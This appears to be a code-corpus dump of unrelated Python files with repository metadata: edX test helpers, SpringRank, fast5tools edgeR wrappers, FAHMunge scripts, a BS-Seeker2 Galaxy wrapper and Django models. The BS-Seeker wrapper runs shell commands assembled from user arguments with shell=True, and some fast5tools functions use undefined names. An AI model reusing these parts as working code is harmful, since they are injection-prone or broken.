def assert_matching_events_were_emitted(self, start_time=None, event_filter=None, number_of_matches=1):
"""Assert that at least `number_of_matches` events have passed the filter since `start_time`."""
description = CollectedEventsDescription(
'Not enough events match the filter:\n' + self.event_filter_to_descriptive_string(event_filter),
functools.partial(self.get_matching_events_from_time, start_time=start_time, event_filter={})
)
self.assertTrue(
self.matching_events_were_emitted(
start_time=start_time, event_filter=event_filter, number_of_matches=number_of_matches
),
description
)
def assert_no_matching_events_were_emitted(self, event_filter, start_time=None):
"""Assert that no events have passed the filter since `start_time`."""
matching_events = self.get_matching_events_from_time(start_time=start_time, event_filter=event_filter)
description = CollectedEventsDescription(
'Events unexpected matched the filter:\n' + self.event_filter_to_descriptive_string(event_filter),
lambda: matching_events
)
self.assertEquals(len(matching_events), 0, description)
def assert_events_match(self, expected_events, actual_events, in_order=True):
"""Assert that each actual event matches one of the expected events.
Args:
expected_events (List): a list of dicts representing the expected events.
actual_events (List): a list of dicts that were actually recorded.
in_order (bool): if True then the events must be in the same order (defaults to True).
"""
if in_order:
for expected_event, actual_event in zip(expected_events, actual_events):
assert_event_matches(
expected_event,
actual_event,
tolerate=EventMatchTolerates.lenient()
)
else:
for expected_event in expected_events:
actual_event = next(event for event in actual_events if is_matching_event(expected_event, event))
assert_event_matches(
expected_event,
actual_event or {},
tolerate=EventMatchTolerates.lenient()
)
def relative_path_to_absolute_uri(self, relative_path):
"""Return an aboslute URI given a relative path taking into account the test context."""
return urlparse.urljoin(BASE_URL, relative_path)
def event_filter_to_descriptive_string(self, event_filter):
"""Find the source code of the callable or pretty-print the dictionary"""
message = ''
if callable(event_filter):
file_name = '(unknown)'
try:
file_name = inspect.getsourcefile(event_filter)
except TypeError:
pass
try:
list_of_source_lines, line_no = inspect.getsourcelines(event_filter)
except IOError:
pass
else:
message = '{file_name}:{line_no}\n{hr}\n{event_filter}\n{hr}'.format(
event_filter=''.join(list_of_source_lines).rstrip(),
file_name=file_name,
line_no=line_no,
hr='-' * 20,
)
if not message:
message = '{hr}\n{event_filter}\n{hr}'.format(
event_filter=pprint.pformat(event_filter),
hr='-' * 20,
)
return message
class CollectedEventsDescription(object):
"""
Produce a clear error message when tests fail.
This class calls the provided `get_events_func` when converted to a string, and pretty prints the returned events.
"""
def __init__(self, description, get_events_func):
self.description = description
self.get_events_func = get_events_func
def __str__(self):
message_lines = [
self.description,
'Events:'
]
events = self.get_events_func()
events.sort(key=operator.itemgetter('time'), reverse=True)
for event in events[:MAX_EVENTS_IN_FAILURE_OUTPUT]:
message_lines.append(pprint.pformat(event))
if len(events) > MAX_EVENTS_IN_FAILURE_OUTPUT:
message_lines.append(
'Too many events to display, the remaining events were omitted. Run locally to diagnose.')
return '\n\n'.join(message_lines)
class AcceptanceTest(WebAppTest):
"""
The base class of all acceptance tests.
"""
def __init__(self, *args, **kwargs):
super(AcceptanceTest, self).__init__(*args, **kwargs)
# Use long messages so that failures show actual and expected values
self.longMessage = True # pylint: disable=invalid-name
def tearDown(self):
try:
self.browser.get('http://{}:{}'.format(
os.environ.get('BOK_CHOY_HOSTNAME', '127.0.0.1'),
os.environ.get('BOK_CHOY_LMS_PORT', 8003),
))
except: # pylint: disable=bare-except
self.browser.get('http://{}:{}'.format(
os.environ.get('BOK_CHOY_HOSTNAME', '127.0.0.1'),
os.environ.get('BOK_CHOY_CMS_PORT', 8031),
))
logs = self.browser.execute_script("return window.localStorage.getItem('console_log_capture');")
if not logs:
return
logs = json.loads(logs)
log_dir = path('test_root') / 'log'
if 'shard' in os.environ:
log_dir /= "shard_{}".format(os.environ["SHARD"])
log_dir.mkdir_p()
with (log_dir / '{}.browser.log'.format(self.id()[:60])).open('w') as browser_log:
for (message, url, line_no, col_no, stack) in logs:
browser_log.write(u"{}:{}:{}: {}\n {}\n".format(
url,
line_no,
col_no,
message,
(stack or "").replace('\n', '\n ')
))
super(AcceptanceTest, self).tearDown()
class UniqueCourseTest(AcceptanceTest):
"""
Test that provides a unique course ID.
"""
def setUp(self):
super(UniqueCourseTest, self).setUp()
self.course_info = {
'org': 'test_org',
'number': self.unique_id,
'run': 'test_run',
'display_name': 'Test Course' + XSS_INJECTION + self.unique_id
}
@property
def course_id(self):
"""
Returns the serialized course_key for the test
"""
# TODO - is there a better way to make this agnostic to the underlying default module store?
default_store = os.environ.get('DEFAULT_STORE', 'draft')
course_key = CourseLocator(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
deprecated=(default_store == 'draft')
)
return unicode(course_key)
class YouTubeConfigError(Exception):
"""
Error occurred while configuring YouTube Stub Server.
"""
pass
class YouTubeStubConfig(object):
"""
Configure YouTube Stub Server.
"""
YOUTUBE_HOSTNAME = os.environ.get('BOK_CHOY_HOSTNAME', '127.0.0.1')
PORT = 9080
URL = 'http://{}:{}/'.format(YOUTUBE_HOSTNAME, PORT)
@classmethod
def configure(cls, config):
"""
Allow callers to configure the stub server using the /set_config URL.
Arguments:
config (dict): Configuration dictionary.
Raises:
YouTubeConfigError
"""
youtube_stub_config_url = cls.URL + 'set_config'
config_data = {param: json.dumps(value) for param, value in config.items()}
response = requests.put(youtube_stub_config_url, data=config_data)
if not response.ok:
raise YouTubeConfigError(
'YouTube Server Configuration Failed. URL {0}, Configuration Data: {1}, Status was {2}'.format(
youtube_stub_config_url, config, response.status_code))
@classmethod
def reset(cls):
"""
Reset YouTube Stub Server Configurations using the /del_config URL.
Raises:
YouTubeConfigError
"""
youtube_stub_config_url = cls.URL + 'del_config'
response = requests.delete(youtube_stub_config_url)
if not response.ok:
raise YouTubeConfigError(
'YouTube Server Configuration Failed. URL: {0} Status was {1}'.format(
youtube_stub_config_url, response.status_code))
@classmethod
def get_configuration(cls):
"""
Allow callers to get current stub server configuration.
Returns:
dict
"""
youtube_stub_config_url = cls.URL + 'get_config'
response = requests.get(youtube_stub_config_url)
if response.ok:
return json.loads(response.content)
else:
return {}
def click_and_wait_for_window(page, element):
"""
To avoid a race condition, click an element that launces a new window, and
wait for that window to launch.
To check this, make sure the number of window_handles increases by one.
Arguments:
page (PageObject): Page object to perform method on
element (WebElement): Clickable element that triggers the new window to open
"""
num_windows = len(page.browser.window_handles)
element.click()
WebDriverWait(page.browser, 10).until(
lambda driver: len(driver.window_handles) > num_windows
)
def create_user_partition_json(partition_id, name, description, groups, scheme="random"):
"""
Helper method to create user partition JSON. If scheme is not supplied, "random" is used.
"""
# All that is persisted about a scheme is its name.
class MockScheme(object):
name = scheme
return UserPartition(
partition_id, name, description, groups, MockScheme()
).to_json()
def assert_nav_help_link(test, page, href, signed_in=True, close_window=True):
"""
Asserts that help link in navigation bar is correct.
It first checks the url inside anchor DOM element and
then clicks to ensure that help opens correctly.
Arguments:
test (AcceptanceTest): Test object
page (PageObject): Page object to perform tests on.
href (str): The help link which we expect to see when it is opened.
signed_in (bool): Specifies whether user is logged in or not. (It affects the css)
close_window(bool): Close the newly-opened help window before continuing
"""
expected_link = {
'href': href,
'text': 'Help'
}
# Get actual anchor help element from the page.
actual_link = page.get_nav_help_element_and_click_help(signed_in)
# Assert that 'href' and text are the same as expected.
assert_link(test, expected_link, actual_link)
# Assert that opened link is correct
assert_opened_help_link_is_correct(test, href)
# Close the help window if not kept open intentionally
if close_window:
close_help_window(page)
def assert_side_bar_help_link(test, page, href, help_text, as_list_item=False, index=-1, close_window=True):
"""
Asserts that help link in side bar is correct.
It first checks the url inside anchor DOM element and
then clicks to ensure that help opens correctly.
Arguments:
test (AcceptanceTest): Test object
page (PageObject): Page object to perform tests on.
href (str): The help link which we expect to see when it is opened.
as_list_item (bool): Specifies whether help element is in one of the
'li' inside a sidebar list DOM element.
index (int): The index of element in case there are more than
one matching elements.
close_window(bool): Close the newly-opened help window before continuing
"""
expected_link = {
'href': href,
'text': help_text
}
# Get actual anchor help element from the page.
actual_link = page.get_side_bar_help_element_and_click_help(as_list_item=as_list_item, index=index)
# Assert that 'href' and text are the same as expected.
assert_link(test, expected_link, actual_link)
# Assert that opened link is correct
assert_opened_help_link_is_correct(test, href)
# Close the help window if not kept open intentionally
if close_window:
close_help_window(page)
def close_help_window(page):
"""
Closes the help window
Args:
page (PageObject): Page object to perform tests on.
"""
browser_url = page.browser.current_url
if browser_url.startswith('https://edx.readthedocs.io') or browser_url.startswith('http://edx.readthedocs.io'):
page.browser.close() # close only the current window
page.browser.switch_to_window(page.browser.window_handles[0])
class TestWithSearchIndexMixin(object):
""" Mixin encapsulating search index creation """
TEST_INDEX_FILENAME = "test_root/index_file.dat"
def _create_search_index(self):
""" Creates search index backing file """
with open(self.TEST_INDEX_FILENAME, "w+") as index_file:
json.dump({}, index_file)
def _cleanup_index_file(self):
""" Removes search index backing file """
remove_file(self.TEST_INDEX_FILENAME)
|
gsehub/edx-platform
|
common/test/acceptance/tests/helpers.py
|
Python
|
agpl-3.0
| 36,453
|
[
"VisIt"
] |
378f9f7945610befb28c8365bb97e8a97481445f90fc68602f4db04fce3f27e4
|
import networkx as nx
import numpy as np
import scipy.sparse
import scipy.sparse.linalg
def SpringRank(A,alpha=0.,l0=1.0,l1=1.0):
"""
Main routine to calculate SpringRank by solving linear system
Default parameters are initialized as in the standard SpringRank model
INPUT:
A=network adjacency matrix (can be weighted)
alpha: controls the impact of the regularization term
l0: regularization spring's rest length
l1: interaction springs' rest length
OUTPUT:
rank: N-dim array, indeces represent the nodes' indices used in ordering the matrix A
"""
N=A.shape[0]
k_in=np.sum(A,0)
k_out=np.sum(A,1)
One=np.ones(N)
C= A+A.T
D1 = np.zeros(A.shape)
D2 = np.zeros(A.shape)
for i in range(A.shape[0]):
D1[i,i]=k_out[i,0]+k_in[0,i]
D2[i,i]=l1*(k_out[i,0]-k_in[0,i])
if alpha!=0.:
print('Using alpha!=0: matrix is invertible')
B=One*alpha*l0+np.dot(D2,One)
A=alpha*np.eye(N)+D1-C
A=scipy.sparse.csr_matrix(np.matrix(A))
try:
print('Trying scipy.sparse.linalg.spsolve(A,B)')
rank = scipy.sparse.linalg.spsolve(A,B)
# rank=np.linalg.solve(A,B)
return np.transpose(rank)
except:
print('Switched to scipy.sparse.linalg.bicgstab(A,B)[0]')
rank=scipy.sparse.linalg.bicgstab(A,B)[0]
return np.transpose(rank)
else:
print('Using faster computation: fixing a rank degree of freedom')
C= C+np.repeat(A[N-1,:][None],N,axis=0)+np.repeat(A[:,N-1].T[None],N,axis=0)
D3 = np.zeros(A.shape)
for i in range(A.shape[0]):D3[i,i]=l1*(k_out[N-1,0]-k_in[0,N-1])
B=np.dot(D2,One)+np.dot(D3,One)
# A=D1-C
A=scipy.sparse.csr_matrix(np.matrix(D1-C))
try:
linalg.cond(x) < 1/sys.float_info.epsilon
print('Trying scipy.sparse.linalg.spsolve')
rank = scipy.sparse.linalg.spsolve(A,B)
# rank=np.linalg.solve(A,B) # cannot use it with sparse matrices
print(rank)
return np.transpose(rank)
except:
print('Switched to scipy.sparse.linalg.bicgstab(A,B)[0]')
rank=scipy.sparse.linalg.bicgstab(A,B)[0]
# rank=np.linalg.lstsq(A,B)[0]
return np.transpose(rank)
def SpringRank_planted_network(N,beta,alpha,K,prng,l0=0.5,l1=1.):
'''
Uses the SpringRank generative model to build a directed, possibly weigthed and having self-loops, network.
Can be used to generate benchmarks for hierarchical networks
Steps:
1. Generates the scores (default is factorized Gaussian)
2. Extracts A_ij entries (network edges) from Poisson distribution with average related to SpringRank energy
INPUT:
N=# of nodes
beta= inverse temperature, controls noise
alpha=controls prior's variance
K=E/N --> average degree, controls sparsity
l0=prior spring's rest length
l1=interaction spring's rest lenght
OUTPUT:
G: nx.DiGraph() Directed (possibly weighted graph, there can be self-loops)
'''
G=nx.DiGraph()
scores=prng.normal(l0,1./np.sqrt(alpha*beta),N) # planted scores ---> uses factorized Gaussian
for i in range(N):G.add_node(i,score=scores[i])
# ---- Fixing sparsity i.e. the average degree ----
Z=0.
for i in range(N):
for j in range(N):
Z+=np.exp(-0.5*beta*np.power(scores[i]-scores[j]-l1,2))
c=float(K*N)/Z
# --------------------------------------------------
# ---- Building the graph ------------------------
for i in range(N):
for j in range(N):
H_ij=0.5*np.power((scores[i]-scores[j]-l1),2)
lambda_ij=c*np.exp(-beta*H_ij)
A_ij=prng.poisson(lambda_ij,1)[0]
if A_ij>0:G.add_edge(i,j,weight=A_ij)
return G
|
compsocialscience/summer-institute
|
2018/materials/boulder/day3-networks/SpringRank_tools.py
|
Python
|
mit
| 4,015
|
[
"Gaussian"
] |
4f729ea354aa1566d5ea41833dcdbaaf0c556f4c198c0f5578ed8b999acaa871
|
import numpy as np
from collections import defaultdict
from fast5tools.helperops import *
try:
Rless=False
has_R=True
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
##import rpy2.robjects.lib.ggplot2 as ggplot2
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
from fast5tools.edgeRops import *
except:
Rless=True
has_R=False
sys.stderr.write('''
Analyses that use R cannot be performed.
Make sure to install:
- Download R at: https://www.r-project.org/
- the ggplot2 library in R: install.packagaes('ggplot2')
- ggplot2 fast5tools plots have been discontinued, so you can safely ignore this.
- Install edgeR:
- See: https://bioconductor.org/packages/release/bioc/html/edgeR.html
source("https://bioconductor.org/biocLite.R")
biocLite("edgeR")
- the rpy2 package from terminal/cmdline: pip install rpy2
- Install all necessary R stuff before rpy2, which may complain about R/library versions.
Then try again.\n\n''')
## FUNCTIONS - some/many of these are no longer needed per se (the EdgeR class is the new approach)
if has_R:
def load_edgeR():
## Load EdgeR Library
robjects.r('''
library(edgeR, quietly = TRUE)
''')
def make_edgeR_function():
## Make EdgeR Function, "f"
robjects.r('''
f <- function(data, groups, genes, bcv){
y <- DGEList(counts=data, group=groups, genes=as.matrix(genes, ncol=1))
y <- calcNormFactors(y)
y <- calcNormFactors(y)
et <- exactTest(y, dispersion=bcv^2)
return(et)
}
''')
## Return EdgeR Function:
return robjects.globalenv['f']
def get_edgeR_function():
load_edgeR()
return make_edgeR_function()
_get_DGE_list_ = get_edgeR_function()
def get_DGE_list(data, groups, genes, bcv):
return _get_DGE_list_(data, groups, genes, bcv)
## New approach
def get_edgeR_functions():
load_edgeR()
return robjects.r['DGEList'], robjects.r['calcNormFactors'], robjects.r['exactTest']
_DGEList, _calcNormFactors, _exactTest = get_edgeR_functions()
def DGEList(counts, group, genes):
'''counts is "data" in EdgeR class'''
# This worked y = _DGEList(counts=np.array([[1,2],[1,3],[1,4],[1,5]]), group=np.array([1,2]), genes=np.array(['a','b','c','d']))
return _DGEList(counts=counts, group=group, genes=genes)#
def calcNormFactors(dgelist):
return _calcNormFactors(dgelist)
def exactTest(normdgelist, bcv=False, dispersion=False):
''' dispersion is just bcv**2'''
if bcv is not False:
return _exactTest(normdgelist, dispersion=bcv**2)
elif dispersion is not False:
return _exactTest(normdgelist, dispersion=dispersion)
def get_tag_table(dgelist, n_genes):
''' dgelist from get_DGE_list()
n_genes is len(genes)'''
return robjects.r.topTags(dgelist, n=n_genes)[0]
def get_counts(kmercounts, refcounts):
'''Returns dict of dicts.
ref = condition1.
test = condition2.
'''
## read in and equilibrate the 2 kmer count tables
self.kmerdict, self.refdict = readInTwoKmerTables(kmercounts, refcounts)
## add total counts to respective kmerdicts
kmerdict["Total"] = totalKmerCount(kmerdict)
refdict["Total"] = totalKmerCount(kmerdict2)
## add kmdericts to defaultdict(dict) that has keys condition1 and condition2
counts = defaultdict(dict)
counts['condition1'] = dict(refdict)
counts['condition2'] = dict(kmerdict)
return dict(counts)
def get_conditions(counts):
''' Simply returns condition names - which are keys in counts dict.'''
return sorted(counts.keys())
def get_genes(counts, conditions=None):
''' Simply returns list of all unique kmers/genes found in the conditions to deal with 1 set.'''
if conditions is None:
conditions = get_conditions(counts)
all_genes = []
for condition in conditions:
all_genes.extend(counts[condition].keys())
return sorted(list(set(all_genes)))
def get_sizes(counts, conditions):
''' Simply returns total counts across all kmers/genes in each condition of counts dict.'''
if conditions is None:
conditions = get_conditions(counts)
sizes = [work_counts[c]["Total"] for c in conditions]
assert len(sizes) == 2
return sizes
def get_conditions_and_genes(work_counts):
conditions = work_counts.keys()
conditions.sort()
all_genes = []
for c in conditions:
all_genes.extend(work_counts[c].keys())
all_genes = list(set(all_genes))
all_genes.sort()
sizes = [work_counts[c]["Total"] for c in conditions]
assert len(sizes) == 2
all_genes.remove("Total")
return conditions, all_genes, sizes
def edger_matrices(work_counts, conditions, all_genes, sizes):
"""Retrieve matrices for input into edgeR differential expression analysis.
"""
groups = [1, 2]
data = []
final_genes = []
for g in all_genes:
cur_row = [int(work_counts[c][g]) for c in conditions]
if sum(cur_row) > 0:
data.append(cur_row)
final_genes.append(g)
return (numpy.array(data), numpy.array(groups), numpy.array(sizes),
conditions, final_genes)
def run_kmer_diff(parser, args):
counts = make_count_dict(parser, args)
data, groups, sizes, conditions, genes = edger_matrices(counts)
probs = run_edger(data, groups, sizes, genes, args)
#### CLASSES
if has_R:
class EdgeR(object):
def __init__(self, testdict, refdict, bcv=None):
''' testdict,refdict are both default_dictionaries_int with kmer/gene keys and counts as values.'''
## read in and equilibrate the 2 kmer count tables
#self.testdict = testdict
#self.refdict = refdict
rpy2.robjects.numpy2ri.activate() ## This needs to be deactivated before the iter_rows() thing
self.bcv = bcv
self.conditions = ['condition1', 'condition2']
self.groups = np.array([1,2])
#self.test_size = sum(testdict.values())
#self.ref_size = sum(refdict.values())
self.sizes = np.array([sum(refdict.values()), sum(testdict.values())])
self.counts = {'condition1':refdict, 'condition2':testdict}
self.all_genes = sorted(list(set(testdict.keys() + refdict.keys())))
self._define_data()
self._ensureEqualKmerSets()
self._debug_bcv=0.2
#self.dgelist = get_DGE_list(self.data, self.groups, self.final_genes, self._debug_bcv)
#self.tag_table = get_tag_table(self.dgelist, self.n_genes)
self.dgelist = DGEList(self.data, self.groups, np.array(self.final_genes))
self.dgelist = calcNormFactors(self.dgelist)
self._determine_bcv(bcv)
self.exactTest_results = exactTest(self.dgelist, dispersion=self.bcvsq)
self.tag_table = get_tag_table(self.exactTest_results, self.n_genes)
self.table_string = ''
self.results = defaultdict(list)
self._process_results()
self.medianNorm = None
def _define_data(self):
self.data = []
self.final_genes = []
for gene in self.all_genes:
curr_row = [int(self.counts[condition][gene]) for condition in self.conditions]
if sum(curr_row) > 0:
self.data.append(curr_row)
self.final_genes.append(gene)
self.data = np.array(self.data)
self.n_genes = len(self.final_genes)
def _ensureEqualKmerSets(self):
for key in self.final_genes:
self.counts['condition1'][key]
self.counts['condition2'][key]
def _determine_bcv(self, bcv=None):
if bcv is not None:
self.bcvsq = bcv**2
## Else, get median sd from
else:
#self.bcvsq = "auto"
self.bcvsq = 0.2**2
## Could be set to a default value - e.g. 0.2
## Could be set to a diff value for each - e.g. a poisson-ish std given ref count, or std between conditions
## Could be set to other strings: "common", "trended", "tagwise"
def _process_results(self):
self.table_string = ''
rpy2.robjects.numpy2ri.deactivate()
for e in self.tag_table.iter_row():
out = ("\t").join(str(e).split("\n")[1].split())
## Add to table_string
self.table_string += out + '\n'
## Add elements to this class
x = out.split("\t")
self.results['k'].append(x[1])
self.results['logfc'].append(float(x[2]))
self.results['logcpm'].append(float(x[3]))
self.results['p'].append(float(x[4]))
self.results['fdr'].append(float(x[5]))
rpy2.robjects.numpy2ri.activate()
def get_countsdict(self):
return self.counts
def get_testdict(self):
return self.counts['condition2']
def get_refdict(self):
return self.counts['condition1']
def get_conditions(self):
return self.conditions
def get_groups(self):
return self.goups
def get_sizes(self):
return self.get_sizes
def get_data(self):
return self.data
def get_genes(self):
assert self.final_genes == self.all_genes ## rm this line
return self.final_genes
def get_dge_list(self):
return self.dgelist
def get_norm_factors(self, condition=None):
if condition is None:
return self.dgelist[1][2]
else:
assert condition in [0,1]
return self.dgelist[1][2][condition]
def get_condition_sizes_from_dgelist(self):
return self.dgelist[1][1]
def get_dgelist_counts(self):
return self.dgelist[0]
def get_dge_list_genes(self):
return self.dgelist[2][0]
def get_normalized_counts(self):
return self.get_dgelist_counts() * self.get_norm_factors()
def get_average_normalized_counts_across_conditions(self):
return self.get_normalized_counts().mean(1)
def get_stdev_of_normalized_counts_across_conditions(self):
return self.get_normalized_counts().std(1, ddof=1)
def get_tag_table(self):
return self.tag_table
def get_table_string(self):
return self.table_string
def get_k_(self): #genes/names
return list(self.exactTest_results[2][0])
def get_k(self): #genes/names
return self.results['k']
#return list(self.exactTest_results[2][0])
def get_logfc(self):
return self.results['logfc']
def get_logcpm(self):
return self.results['logcpm']
def get_pvalues(self):
return self.results['p']
def get_fdr(self):
return self.results['fdr']
def __str__(self):
return self.get_table_string()
|
JohnUrban/fast5tools
|
fast5tools/edgeRops.py
|
Python
|
mit
| 11,680
|
[
"Bioconductor"
] |
977852fb128c9ded10439242af6d64e5105fc03f75113422f27120e1a3a5e58b
|
import glob
import os
import mdtraj as md
import fah
def make_path(filename):
try:
path = os.path.split(filename)[0]
os.makedirs(path)
except OSError:
pass
def get_num_runs_clones(path):
"""Get the number of runs and clones.
Parameters
----------
path : str
Path to FAH data.
Returns
-------
n_runs : int
n_clones : int
Notes
-----
Assumes each run has the same number of clones.
"""
runs = glob.glob(os.path.join(path, "RUN*"))
n_runs = len(runs)
if n_runs == 0:
n_clones = 0
else:
clones = glob.glob(os.path.join(path, "RUN0", "CLONE*"))
n_clones = len(clones)
return n_runs, n_clones
def strip_water(path_to_merged_trajectories, output_path, min_num_frames=1):
"""Strip the water for a set of trajectories.
Parameters
----------
path_to_merged_trajectories : str
Path to merged HDF5 FAH trajectories
output_path : str
Path to put stripped trajectories
protein_atom_indices : np.ndarray, dtype='int'
Atom indices for protein atoms (or more generally, atoms to keep).
min_num_frames : int, optional, default=1
Skip if below this number.
Notes
-----
Assumes each run has the same number of clones.
"""
in_filenames = glob.glob(os.path.join(path_to_merged_trajectories, "*.h5"))
for in_filename in in_filenames:
t=md.load(in_filename)
topology=t.top.select('protein')
print("Stripping %s" % in_filename)
protein_filename = os.path.join(output_path, os.path.basename(in_filename))
fah.strip_water(in_filename, protein_filename, topology, min_num_frames=min_num_frames)
def merge_fah_trajectories(input_data_path, output_data_path, top_filename):
"""Strip the water for a set of trajectories.
Parameters
----------
input_data_path : str
Path to FAH Core17/Core18 data directory. E.g. XYZ/server2/data/SVRXYZ/PROJ10470/
output_data_path : str
Path to dump merged HDF5 files with concantenated trajectories.
Metadata for which files are processed are included INSIDE the HDF5
files.
top_filename : str,
filename of PDB containing the topology information, necessary
for loading the XTC files.
"""
n_runs, n_clones = get_num_runs_clones(input_data_path)
for run in range(n_runs):
top=md.load(top_filename % vars())
for clone in range(n_clones):
print(run, clone)
path = os.path.join(input_data_path, "RUN%d" % run, "CLONE%d" % clone)
out_filename = os.path.join(output_data_path, "run%d-clone%d.h5" % (run, clone))
print(path)
print(out_filename)
try:
fah.concatenate_core17(path, top, out_filename)
except RuntimeError:
print("Cannot munge RUN%d CLONE%d due to damaged XTC." % (run, clone))
continue
|
steven-albanese/FAHMunge
|
FAHMunge/automation.py
|
Python
|
lgpl-2.1
| 3,038
|
[
"MDTraj"
] |
63f62361075646143c311141302e42c2d5fc78c98be14fa662e1a0371dd0519c
|
import tempfile
__author__ = 'pf'
from subprocess import Popen
from collections import defaultdict
import sys, shutil, os, re
BUILD = 'build'
ALIGN = 'align'
CALL_METHYLATION = 'call_methylation'
EXEC = 'exec'
EXEC_PATH = EXEC+'-path'
ARG_TYPES = [BUILD, ALIGN, CALL_METHYLATION, EXEC]
USAGE = """
%(script)s is a wrapper script for bs_seeker2-build.py and bs_seeker2-align.py that is intended to be used with the Galaxy web platform.
The script takes command line parameters and runs bs_seeker2-align.py and bs_seeker2-build.py, if neccessary.
The parameters that are related to bs_seeker2-build.py must be prefixed with --%(build_tag)s.
The parameters that are related to bs_seeker2-align.py must be prefixed with --%(align_tag)s.
Additionally, the path to BS-Seeker2 has to be specified via the --%(exec_path)s option.
For example:
python %(script)s --%(exec_path)s /mnt/Data/UCLA/Matteo/BS-Seeker --build-f data/arabidopsis/genome/Arabidopsis.fa --align-i data/arabidopsis/BS6_N1try2L7_seq.txt.fa --align-o data/arabidopsis/BS6_N1try2L7_seq.txt.fa.test_output
This will run build the genome in Arabidopsis.fa and put the indexes in a temporary directory. bs_seeker2-align.py will be run on the
newly created genome index. I.e. the following two commands will be run in a shell:
python /mnt/Data/UCLA/Matteo/BS-Seeker/bs_seeker2-build.py --db /tmp/tmpg8Eq1o -f /mnt/Data/UCLA/Matteo/bck_BS-Seeker/data/arabidopsis/genome/Arabidopsis.fa
python /mnt/Data/UCLA/Matteo/BS-Seeker/bs_seeker2-align.py --db /tmp/tmpg8Eq1o -o /mnt/Data/UCLA/Matteo/bck_BS-Seeker/data/arabidopsis/BS6_N1try2L7_seq.txt.fa.test_output -i /mnt/Data/UCLA/Matteo/bck_BS-Seeker/data/arabidopsis/BS6_N1try2L7_seq.txt.fa -g Arabidopsis.fa
The temporary directory will be deleted after the wrapper exits.
If no options related to bs_seeker2-build are passed, no genome index will be built and the corresponding pre-built genome index will be used
instead. No temporary files and directories will be created.
""" % { 'script' : os.path.split(__file__)[1], 'build_tag' :BUILD, 'align_tag' : ALIGN, 'exec_path' : EXEC_PATH }
def error(msg):
print >> sys.stderr, 'ERROR: %s' % msg
exit(1)
if __name__ == '__main__':
if len(sys.argv) == 1:
error('No parameters\n\n'+USAGE)
# Parse command line arguments
args = defaultdict(dict)
arg_key = None
arg_val = None
arg_type = None
for arg in sys.argv[1:]:
if arg.startswith('--'):
try:
arg_type, arg_key = re.match(r'--(\w+)(.*)', arg).groups()
if arg_type not in ARG_TYPES:
raise Exception("Bad argument: %s. arg_type (%s) must be one of: %s." % (arg, arg_type, ', '.join(ARG_TYPES)))
if not arg_key or arg_key[0] != '-':
raise Exception("Bad argument: %s. arg_key (%s) must start with - or --." % (arg, arg_key))
except Exception, e:
error(str(e) + '\n\n' + USAGE)
args[arg_type][arg_key] = ''
else:
args[arg_type][arg_key] = arg
path_to_bs_seeker = args.get('exec', {'-path' : None})['-path'] # return None when exec not found
if path_to_bs_seeker is None:
error('You have to specify the path to BS-Seeker2 via --%s\n\n' % EXEC_PATH + USAGE)
tempdir = None
def run_prog(prog, params):
cwd, _ = os.path.split(__file__)
cmd = 'python %(prog)s %(params)s' % {
'prog' : os.path.join(cwd, prog),
'params' : ' '.join('%s %s' % (arg_key, arg_val) for arg_key, arg_val in params.items())
}
print 'exec:', cmd
return_code = Popen(args = cmd, shell = True).wait()
if return_code:
if tempdir:
shutil.rmtree(tempdir)
error("%s exit with error code %d" % (prog, return_code))
tempdir = tempfile.mkdtemp()
# bs_seeker2-build
if BUILD in args:
args[BUILD]['--db'] = tempdir
args[ALIGN]['--db'] = tempdir
run_prog(os.path.join(path_to_bs_seeker, 'bs_seeker2-build.py'), args[BUILD])
# bs_seeker2-align
args[ALIGN]['--temp_dir'] = tempdir
run_prog(os.path.join(path_to_bs_seeker, 'bs_seeker2-align.py'), args[ALIGN])
def getopt(h, k1, k2, default):
return h.get(k1, h.get(k2, default))
# bs_seeker2-call_methylation
args[CALL_METHYLATION].update({ '-i' : args[ALIGN]['--output'],
'--db' : os.path.join(args[ALIGN]['--db'],
os.path.split( getopt(args[ALIGN],'-g', '--genome', None))[1] +
('_rrbs_%s_%s' % (getopt(args[ALIGN], '-l', '--low', '40'),
getopt(args[ALIGN], '-u', '--up', '500'))
if len(set(['-r', '--rrbs']) & set(args[ALIGN])) > 0 else '') +
'_' + args[ALIGN]['--aligner'])
})
run_prog(os.path.join(path_to_bs_seeker, 'bs_seeker2-call_methylation.py'), args[CALL_METHYLATION])
if tempdir:
shutil.rmtree(tempdir)
|
BSSeeker/BSseeker2
|
galaxy/bs_seeker2_wrapper.py
|
Python
|
mit
| 5,196
|
[
"Galaxy"
] |
5090ed92fc365092bb5c5f638f73b1b919907d772803d29c5f6e2027752ab9f3
|
from __future__ import unicode_literals
from enum import Enum
from django.db import models
from django.contrib.auth.models import User
class DataType(Enum):
"""
Enumeration of valid file types
"""
NETCDF = 1
TEXT = 2
JSON = 3
NAMELIST = 4
IMAGE = 5
XML = 6
class BaseModel(models.Model):
"""
A simple base model to subclass from when we want to keep track of create and modify dates
"""
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now_add=True)
class Meta:
"""
Declare this class abstract
"""
abstract = True
ordering = ["created_date"]
class DataFile(BaseModel):
"""
Model of data stored by the users
Inherit date fields from BaseModel
"""
path = models.CharField(max_length=255)
display_name = models.CharField(max_length=255)
owner = models.ForeignKey(User, related_name='data_owner_user')
allowed_access = models.ManyToManyField(User, related_name='file_allowed_access_users')
data_type = models.IntegerField(DataType)
def toDict(self):
"""
Dump contents to dict
"""
return {
'id': self.id,
'path': self.path,
'display_name': self.display_name,
'owner': self.owner.username,
'allowed_access': [user.username for user in self.allowed_access.all()],
'data_type': self.data_type
}
class DataSet(BaseModel):
"""
A container for data files, to group them into sets of data
"""
name = models.CharField(max_length=255)
allowed_access = models.ManyToManyField(User, related_name='data_set_allowed_access_users')
file_list = models.ManyToManyField(DataFile, related_name='data_set_contents')
metadata = models.CharField(max_length=1023)
owner = models.ForeignKey(User, related_name='dataset_owner')
def toDict(self):
"""
Dump contents to a dict
"""
return {
'id': self.id,
'name': self.name,
'metadata': self.metadata,
'allowed_access': [user.username for user in self.allowed_access.all()],
'file_list': [file.display_name for file in self.file_list.all()],
'owner': str(self.owner)
}
|
sterlingbaldwin/acme_workbench
|
workbench-backend/file_manager/models.py
|
Python
|
bsd-2-clause
| 2,346
|
[
"NetCDF"
] |
568ea9b0b325cd0d9fe32b22e19472eea7e220ab9981902c4fdffa8cf5733f47
|
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
